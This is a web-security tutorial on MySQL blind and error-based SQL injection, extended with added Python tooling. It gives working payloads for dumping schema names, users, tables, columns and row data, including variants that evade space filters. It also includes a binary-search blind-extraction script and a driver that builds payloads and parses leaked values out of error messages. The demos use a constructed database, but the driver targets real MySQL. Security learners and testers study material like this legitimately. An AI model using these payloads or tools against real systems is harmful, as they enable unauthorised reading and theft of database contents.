Web Security, Chapter Four: About SQL Blind Injection

Source: Internet
Author: User
Tags: rand, sql injection

I. SQL blind injection:

When the page shows no echo, the attacker cannot read database contents directly out of the response and has to infer them by guessing, one value at a time. That is blind injection.

II. The first kind: Boolean-based blind injection:

This is the simple one. The most typical example is the pair of requests used when probing for SQL injection:

http://www.localhost.com/sqlinjection?id=1'%20and%20'1'='1
http://www.localhost.com/sqlinjection?id=1'%20and%20'1'='2

In practice you append a condition to a query that is known to return normally, for example substring(database(),1,1)='a'.

For example, id=1 returns the normal page. Then send:
id=1 and substring(database(),1,1)='a'
If the guess is right, the normal page comes back; if not, it does not. Repeating this for every position and every candidate character extracts the value one character at a time.

III. The second kind: time-based blind injection:

SELECT * FROM tablename WHERE id='103' AND IF(substring(database(),1,1)='a', sleep(5), null)-- '
(the trailing ' is the application's own closing quote, pushed behind the -- comment by the injected text)

Here, if the first character is guessed correctly the query sleeps for 5 seconds; otherwise it returns immediately. IF(expr1, result1, result2) returns result1 when expr1 holds and result2 otherwise.

For the details of these two techniques, see:

Web Security Chapter Four, close contact with databases: SQL injection attacks
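Both techniques reduce to asking the database a yes/no question and reading the answer through a side channel: the page contents for Boolean-based, the response time for time-based. The following is an added example, not code from the original post, that implements that loop in Python against a constructed SQLite database standing in for the target application (SQLite has no sleep(), so a Python sleep() is registered under that name, and CASE WHEN stands in for MySQL's if()). It goes beyond the text's one-character-per-guess loop by binary-searching each character's code, which is how a practical extractor works: about seven requests per character instead of up to 95.

```python
import sqlite3
import time


def make_db():
    """Constructed sample database standing in for the target's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id TEXT, title TEXT)")
    conn.execute("INSERT INTO news VALUES ('1', 'hello')")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'p4ss')")
    conn.execute("CREATE TABLE secret_flags (flag TEXT)")
    conn.execute("INSERT INTO secret_flags VALUES ('FLAG{constructed}')")
    # Stand-in for MySQL's sleep(): SQLite has none, so register a Python one.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return conn


def vulnerable_lookup(conn, user_id):
    """The vulnerable endpoint: user input is concatenated into the WHERE clause."""
    sql = "SELECT title FROM news WHERE id='%s'" % user_id
    return conn.execute(sql).fetchall()


def boolean_oracle(conn):
    """Boolean-based: the page shows the row only when the injected condition holds."""
    def ask(cond):
        rows = vulnerable_lookup(conn, "1' AND (%s)-- " % cond)
        return len(rows) > 0
    return ask


def time_oracle(conn, delay=0.15):
    """Time-based: nothing is echoed, so the answer is read from the response time.
    MySQL form: if(<cond>, sleep(5), null); SQLite has CASE instead of if()."""
    def ask(cond):
        payload = "1' AND (CASE WHEN (%s) THEN sleep(%s) ELSE 0 END)-- " % (cond, delay)
        t0 = time.monotonic()
        vulnerable_lookup(conn, payload)
        return time.monotonic() - t0 >= delay / 2
    return ask


def extract(ask, expr, max_len=64):
    """Recover the string value of the SQL expression `expr` through a yes/no oracle.
    MySQL equivalents of the functions used: length(), substring(), ascii()."""
    lo, hi = 0, max_len
    while lo < hi:                      # binary search for the length first
        mid = (lo + hi) // 2
        if ask("length(%s)>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = ""
    for pos in range(1, length + 1):    # then each character, printable ASCII 32..126
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("unicode(substr(%s,%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(extract(boolean_oracle(db), "(SELECT flag FROM secret_flags)"))
    print(extract(time_oracle(db), "(SELECT pw FROM users WHERE name='admin')"))
```

The time oracle decides on half the injected delay, so ordinary network jitter does not flip an answer; on a real target the delay has to be chosen above the server's normal response-time variance, and each answer costs a full wait, which is why the Boolean channel is preferred whenever the page gives any difference at all.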

IV. The third kind: error-based injection (the focus of this chapter):

0. What "error" refers to here

1. floor() error

(1) Template:

id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2), (select (core statement) from information_schema.tables limit 0,1)) x from information_schema.tables group by x) a)--+

(2) Principle:

Quoting a blog post by Reber: https://www.jianshu.com/p/8c2343705100

floor() rounds down to an integer
rand() generates a random number between 0 and 1
rand(0)*2 produces a random number between 0 and 2
floor(rand()*2) errors when there are two records
floor(rand(0)*2) needs more than 3 records; with more than 3 it errors, because its return values follow a fixed pattern
count(*) counts the results, which is equivalent to refreshing a result
group by, while grouping the data, first looks up the value in the virtual table; if it is not there it inserts it, and if it is there count(*) is incremented
when group by is used, floor(rand(0)*2) is evaluated once for the lookup and, if no record exists in the virtual table, evaluated again on the insert into the virtual table, so a duplicate primary key can appear, which is the error
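To see the duplicate key arise, here is an added example (not part of the original post or of Reber's) that reproduces MySQL's RAND() generator, the small LCG in mysys/my_rnd.c with the seeding from sql/item_func.cc, and models the GROUP BY virtual table exactly as the quoted text describes it: the key is evaluated once for the lookup and once more for the insert. Everything else about GROUP BY is left out of the model.

```python
# Model of the floor(rand(0)*2) GROUP BY error. The generator matches MySQL's
# RAND(); the GROUP BY part is the temporary-table model described in the text,
# not a reimplementation of MySQL.
MAX_VALUE = 0x3FFFFFFF


def mysql_rand(seed):
    """Generator reproducing the sequence MySQL's RAND(seed) returns."""
    # randominit(tmp*0x10001+55555555, tmp*0x10000001), both as uint32
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand0_times_2(n, seed=0):
    """The first n values of floor(rand(seed)*2)."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062: Duplicate entry '...' for key 'group_key'."""


def group_by_concat_rand(row_count, leak, seed=0):
    """Model of: select count(*), concat(<leak>, floor(rand(0)*2)) x ... group by x
    over row_count source rows. Returns the virtual table, or raises
    DuplicateEntry carrying the leaked value in the key."""
    gen = mysql_rand(seed)

    def key():
        return leak + str(int(next(gen) * 2))

    table = {}
    for _ in range(row_count):
        k = key()                       # first evaluation: lookup
        if k in table:
            table[k] += 1
        else:
            k2 = key()                  # second evaluation: insert (may differ)
            if k2 in table:
                raise DuplicateEntry("Duplicate entry '%s' for key 'group_key'" % k2)
            table[k2] = 1
    return table


if __name__ == "__main__":
    print(floor_rand0_times_2(8))       # fixed sequence: 0 1 1 0 1 1 ...
    print(group_by_concat_rand(2, "~~:~~security~~:~~"))
    group_by_concat_rand(3, "~~:~~security~~:~~")  # raises DuplicateEntry
```

The sequence starts 0, 1, 1, 0, 1, 1: row one looks up key 0, misses, and inserts key 1; row two looks up key 1 and hits; row three looks up key 0, misses, re-evaluates to key 1 and collides on the insert. That is why information_schema.tables, which always has far more than three rows, is the usual driving table, and why an unseeded rand() only errors by chance.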

V. Payloads: the statements that dump the data:

In the templates below, %s and %d are placeholders filled in by the script that drives the queries (a schema or table name and a row offset). 0x7e7e3a7e7e is the hex form of ~~:~~ and marks the leaked value on both sides so it can be picked out of the duplicate-entry error message.

1. Database Information

# database count
' and (select 1 from (select count(*), concat((select (select concat(0x7e7e3a7e7e, count(distinct table_schema), 0x7e7e3a7e7e) from information_schema.tables) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)--+
# database name
' and (select 1 from (select count(*), concat((select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)--+

2. Current database information

The next variants write /**/ in place of every space, which gets past filters that strip or reject spaces; the query is otherwise the same template.

# current database name
'+and/**/(select/**/1/**/from/**/(select/**/count(*),concat((select/**/(select/**/concat(0x7e7e3a7e7e,(select/**/database()),0x7e7e3a7e7e))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/x/**/from/**/information_schema.tables/**/group/**/by/**/x)/**/a)--+

3. Current user information

# current user
'+and/**/(select/**/1/**/from/**/(select/**/count(*),concat((select/**/(select/**/concat(0x7e7e3a7e7e,(select/**/user()),0x7e7e3a7e7e))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/x/**/from/**/information_schema.tables/**/group/**/by/**/x)/**/a)--+

4. Table information

# table count
'+and/**/(select/**/1/**/from/**/(select/**/count(*),concat((select/**/(select/**/concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=%s)/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/x/**/from/**/information_schema.tables/**/group/**/by/**/x)/**/a)--+
# table name
'+and/**/(select/**/1/**/from/**/(select/**/count(*),concat((select/**/(select/**/concat(0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=%s/**/limit/**/%d,1)/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/x/**/from/**/information_schema.tables/**/group/**/by/**/x)/**/a)--+

5. Column information

# column count
' and (select 1 from (select count(*), concat((select (select concat(0x7e7e3a7e7e, count(column_name), 0x7e7e3a7e7e) from information_schema.columns where table_name=%s and table_schema=%s) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)--+
# column name
' and (select 1 from (select count(*), concat((select (select concat(0x7e7e3a7e7e, column_name, 0x7e7e3a7e7e) from information_schema.columns where table_name=%s and table_schema=%s limit %d,1) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)--+

6. Data

# data
' and (select 1 from (select count(*), concat((select (select concat(%s) from %s.%s limit %d,1) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)--+

7. Supplement: updatexml()/extractvalue() error injection, which shows at most 32 characters of the result in the error message:

id=2 and updatexml(1, concat(0x7e, (select @@version), 0x7e), 1)--+
id=1 and extractvalue(1, concat(0x7e, (select @@version), 0x7e))--+
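The templates in section V and the supplement above are meant to be driven by a script that fills the %s and %d slots and parses the value back out of the error text. Here is such a driver, as an added example that is not part of the original page: it fills the page's floor(rand(0)*2) templates (hex literals are my choice for the quoted %s values; the page does not say how it filled them), pulls the leaked value out from between the ~~:~~ markers in the duplicate-entry error, and, for the updatexml()/extractvalue() variant, splits a long value into 31-character pieces so each fits under the 32-character limit. The error strings it is tested against are constructed, not captured from a server.

```python
import re

# 0x7e7e3a7e7e is the hex form of "~~:~~", the marker the page's payloads put
# on both sides of the leaked value so it can be found in the error message.
DELIM_HEX = "0x7e7e3a7e7e"
DELIM = "~~:~~"


def hex_literal(s):
    """MySQL hex literal for a string, so a %s slot needs no quote characters
    (my choice of quoting; the page leaves the slot unspecified)."""
    return "0x" + s.encode("utf-8").hex()


def marked(expr):
    """Wrap an expression in the ~~:~~ markers."""
    return "concat(%s,%s,%s)" % (DELIM_HEX, expr, DELIM_HEX)


def floor_payload(inner_select):
    """The page's template: a single-row SELECT placed in concat() next to
    floor(rand(0)*2), grouped over information_schema.tables."""
    return ("' and (select 1 from (select count(*), concat((select (%s) "
            "from information_schema.tables limit 0,1), floor(rand(0)*2)) x "
            "from information_schema.tables group by x) a)--+" % inner_select)


def schema_name_payload(index):
    return floor_payload("select distinct %s from information_schema.tables limit %d,1"
                         % (marked("table_schema"), index))


def table_name_payload(schema, index):
    return floor_payload("select %s from information_schema.tables where table_schema=%s limit %d,1"
                         % (marked("table_name"), hex_literal(schema), index))


def column_name_payload(schema, table, index):
    return floor_payload("select %s from information_schema.columns "
                         "where table_schema=%s and table_name=%s limit %d,1"
                         % (marked("column_name"), hex_literal(schema), hex_literal(table), index))


def row_payload(schema, table, columns, index):
    """One row of the listed columns, joined with ':' (0x3a) inside the markers.
    schema and table are identifiers here, so they cannot be hex-encoded."""
    cols = ",0x3a,".join(columns)
    return floor_payload("select %s from %s.%s limit %d,1"
                         % (marked("concat(%s)" % cols), schema, table, index))


FLOOR_ERROR = re.compile(r"Duplicate entry '%s(.*?)%s" % (re.escape(DELIM), re.escape(DELIM)))


def parse_floor_error(message):
    """Leaked value from MySQL error 1062, or None if the response is not that error.
    The trailing 0/1 from floor(rand(0)*2) sits after the closing marker and is dropped."""
    m = FLOOR_ERROR.search(message)
    return m.group(1) if m else None


def updatexml_payloads(expr, total_len):
    """updatexml() shows at most 32 characters of the bad XPath string, one of
    which is the leading '~' marker, so fetch the value 31 characters at a time."""
    return ["and updatexml(1,concat(0x7e,substring((%s),%d,31)),1)--+" % (expr, start)
            for start in range(1, total_len + 1, 31)]


XPATH_ERROR = re.compile(r"XPATH syntax error: '~([^']*)'")


def parse_xpath_error(message):
    m = XPATH_ERROR.search(message)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(table_name_payload("security", 0))
    print(parse_floor_error("Duplicate entry '~~:~~users~~:~~1' for key 'group_key'"))
    print(updatexml_payloads("@@version", 40))
```

A driver loops index upward until parse_floor_error() returns None, which happens once the limit offset runs past the last row and the inner SELECT yields NULL; that NULL is also why the floor() payloads only work against subqueries that return at most one row.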

VI. References:

http://wyb0.com/posts/injection-of-error-based/
